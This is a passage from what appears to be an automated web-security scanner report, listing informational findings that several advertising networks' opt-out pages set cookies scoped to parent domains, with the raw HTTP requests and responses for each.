GET /CookieCheck.php?optThis=1&result=optout_success HTTP/1.1
Host: notrack.specificmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=NOTRACK; expires=Thu, 15-Sep-2016 16:48:26 GMT; path=/; domain=.specificmedia.com
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificmedia.com/CookieCheck.php?refreshCheck=1&optThis=1&result=optout_success
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

12.100. http://oo.afy11.net/NAIOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIOptOut.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NAIOptOut.aspx?nocache=0.7283381 HTTP/1.1
Host: oo.afy11.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: a=9giczsQ9m0aIdZiyorEUmA; s=1,2*4e3f3ebf*IGO51JNM5=*X4rmn3Q---qkEHTEYr1RbVpiIg==*,5*4e4f0e5e*5G3-0JwQvs*4hM6CBAdT525FnQM*,6*4e3f403e*prSKpc=5O1*1zX_b8qUspli5SNX8r-KTrBHYNKPsN5-pIQpNLb1HPFJGDuyf2djy7nMOB0=*,7*4e46e3c5*H7smoJbdBO*OUqWXrs4_xHnkxwtG-oTwrC2_o7qgOoGZNiUPo3CfLWcqOE6*; c=AQECAAAAAAB7LmoESeFFTgAAAAAAAAAAAAAAAAAAAAA-4UVOAgACABGaCNXoAAAAZWNe1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1Cw8AAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPfLgCR4UVOAAAAAAAAAAAAAAAAAAAAAIbhRU4CAAIAee5p1egAAADJQWzV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL-FxtToAAAA1yXH1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; p=AQEBAAAAAAB7LmoESeFFTj-hRU4BAAAACQAAAAEAAAABAAAAAAAAAI6Y29ToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATAAAAAAAAABYAAAAAAAAAGwAAAAAAAAAcAAAAAAAAAICGRB3QAACQhIZEHdAAAJCGhkQd0AAAkLqGRB3QAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2p7vV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; f=AgEBAAAAAACLAZIHTuFFTg==

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /NAIConfirm.aspx
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
Set-Cookie: a=AAAAAAAAAAAAAAAAAAAAAA; domain=afy11.net; expires=Fri, 17-Sep-2021 00:00:00 GMT; path=/
Set-Cookie: f=; domain=afy11.net; expires=Fri, 17-Sep-2010 00:00:00 GMT; path=/
Set-Cookie: c=; domain=afy11.net; expires=Fri, 17-Sep-2010 00:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 17:15:03 GMT
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/NAIConfirm.aspx">here</a>.</h2>
</body></html>
12.101. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/?action=opt-out HTTP/1.1
Host: optout.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=deleted; expires=Fri, 17-Sep-2010 16:48:25 GMT; path=/; domain=.33across.com
Set-Cookie: 33x_nc=33Across+Optout; expires=Tue, 14-Sep-2021 16:48:26 GMT; path=/; domain=.33across.com
Location: http://optout.33across.com/api/?action=verify
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8

12.102. http://optout.adlegend.com/nai/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /nai/optout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout.php?action=setcookie HTTP/1.1
Host: optout.adlegend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:21:41 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sun, 24 Oct 2010 01:00:00 GMT
Set-Cookie: ID=OPT_OUT; expires=Thu, 15-Sep-2016 17:21:41 GMT; path=/; domain=.adlegend.com
Set-Cookie: PrefID=deleted; expires=Fri, 17-Sep-2010 17:21:40 GMT; path=/; domain=.adlegend.com
Set-Cookie: CSList=deleted; expires=Fri, 17-Sep-2010 17:21:40 GMT; path=/; domain=.adlegend.com
Location: /nai/optout.php?action=readcookie
Content-Length: 0
Content-Type: text/html

12.103. http://optout.crwdcntrl.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:19 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 05-Oct-2079 20:33:26 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

12.104. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/dclk/optoutnai.pl HTTP/1.1
Host: optout.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Redirect
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html
Location: http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out
Server: Microsoft-IIS/6.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR FIN INT DEM STA POL HEA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: id=OPT_OUT; domain=.doubleclick.net; path=/; expires=Wednesday, 09-Nov-2030 23:59:00 GMT
Date: Sat, 17 Sep 2011 17:16:06 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl?action=test&amp;state=opt_out">here</a
...[SNIP]...
12.105. http://optout.imiclk.com/cgi/optout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.imiclk.com
Path:   /cgi/optout.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi/optout.cgi?nai=1&nocache=0.9994165 HTTP/1.1
Host: optout.imiclk.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: CH=34695,00000,37118,00000,30330,00000,30298,00000,31482,5dinB,31479,5dinB,33114,00000,22242,5ce2y,32619,00000,31015,00000,32008,00000,32620,00000,30299,00000,28363,5ce2y,36978,00000,30300,00000,32009,00000,37332,00000,32680,00000,30301,00000; YU=357c8d18b23bafe236733d2722dbee8d-5dinB

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://optout.imiclk.com/cgi/nai_status.cgi?oo=1&rand=1316279667
Date: Sat, 17 Sep 2011 17:14:27 GMT
Connection: close
Set-Cookie: OL8U=0; expires=Tue, 14-Sep-2021 17:14:27 GMT; path=/; domain=imiclk.com
Set-Cookie: IMI=OPT_OUT; expires=Tue, 14-Sep-2021 17:14:27 GMT; path=/; domain=imiclk.com
Set-Cookie: YU=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=imiclk.com
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

12.106. http://optout.mookie1.decdna.net/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decdna.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:22:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:22:18 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:22:18 GMT; path=/; domain=.decdna.net
Set-Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:22:19 GMT; path=/; domain=.decdna.net
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.107. http://optout.mookie1.decideinteractive.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decideinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:19:53 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:19:53 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:19:54 GMT; path=/; domain=.decideinteractive.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.108. http://optout.mookie1.dtfssearch.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.dtfssearch.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.dtfssearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:24:22 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:24:22 GMT; path=/; domain=.dtfssearch.com
Set-Cookie: %2edtfssearch%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:24:23 GMT; path=/; domain=.dtfssearch.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.109. http://optout.mookie1.pm14.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.pm14.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:23:30 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:23:30 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:23:31 GMT; path=/; domain=.pm14.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.110. http://optout.mxptint.net/naioptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naioptout.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /naioptout.ashx?nocache=0.8819219 HTTP/1.1
Host: optout.mxptint.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
P3P: CP="NON CUR ADM DEVo PSAo PSDo OUR IND UNI COM NAV DEM STA PRE"
Location: /naicheck.ashx
Set-Cookie: mxpim=optout; domain=mxptint.net; expires=Sun, 17-Sep-2017 17:18:53 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fnaicheck.ashx">here</a>.</h2>
</body></html>
12.111. http://optout.xgraph.net/optout.gif.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.xgraph.net
Path:   /optout.gif.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.gif.jsp?nocache=0.4078982 HTTP/1.1
Host: optout.xgraph.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: _xgcid=598C6089B3DEF3DCD49A516512C9766C; _xguid=21E6599AD7B52492A42B9D3863403A5C

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:21:03 GMT
Location: http://optout.xgraph.net/optout.gif.jsp?check=1
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"
Server: nginx/1.0.4
Set-Cookie: XG_OPT_OUT=OPTOUT; Domain=.xgraph.net; Expires=Sat, 10-Sep-2039 17:21:03 GMT; Path=/
Content-Length: 0
Connection: keep-alive

12.112. http://p.brilig.com/contact/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/optout?nocache=0.4613048 HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:16:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: BriligContact=OPT_OUT; Domain=.brilig.com; Expires=Mon, 09-Sep-2041 17:16:50 GMT
Set-Cookie: bbid=""; Domain=.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: bbid=""; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: BriligContact=OPT_OUT; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 17:16:50 GMT
Location: http://p.brilig.com/contact/isoptout?type=optout
X-Brilig-D: D=753
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

12.113. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?optout=$nai_optout$&nocache=0.8605592 HTTP/1.1
Host: pbid.pro-market.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: anSt=0+4+_f&:8Thd.x&/6x0PP}Nw5E&VGIF^Q_E#%$'>@N!U]l.LzfESl=h:{GMIV8m\!!Iu%\1+x\$v\NS^9wwai|!?[D/ga1/8Ku5D$(=DyON%`14l-/?/`+I49`rEp=[$H2&$9vJz\!!Iu&\1+x\$v\jT2beH|oV~T<n4#E)_`zjW4wf*Qvx=eu!T<iaR@{Sq/yP&nYQ%J8`bOr))FB\!!7>g\2N$\$K\EZu'W~9Jr162wg:MyYeDw6H=`m&L`^PS@:^Azn!I61/ytF(`LCA!ZB0}3S5\!!LH]\2N$\$K\z5%vEThH>_B=#7tJy5e"N%U)(O~aq/'tziEX.Em|J0q=!o.tNsexTp@[J<T\!!7>g\2N$\$K; anTHS=42%7C1312579892800%23; anTD4=07Qtd0IkGsnEjYKpb9dzbv+8odIJmRs74nCMurZsZne72ptFFvRsv4SPZznTs%7C_300201%7C111778%7C1316295502431%7C8%2C14%2C18%2C42%2C5; anHistory=2vzuu3+2+!%11d$j#Q(515#$Y#N/F1Y9$K#KKk; anProfile=2vzuu3+0+s0=(77)+h=bc+1m=1+rv=(-8)+rt='32177B6A'+rs=c+1f=d+4=2lx; AxData=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp4.ny
Set-Cookie: anProfile=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anHistory=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCSC=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCnv=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anSt=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTRD=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTHS=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTD4=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
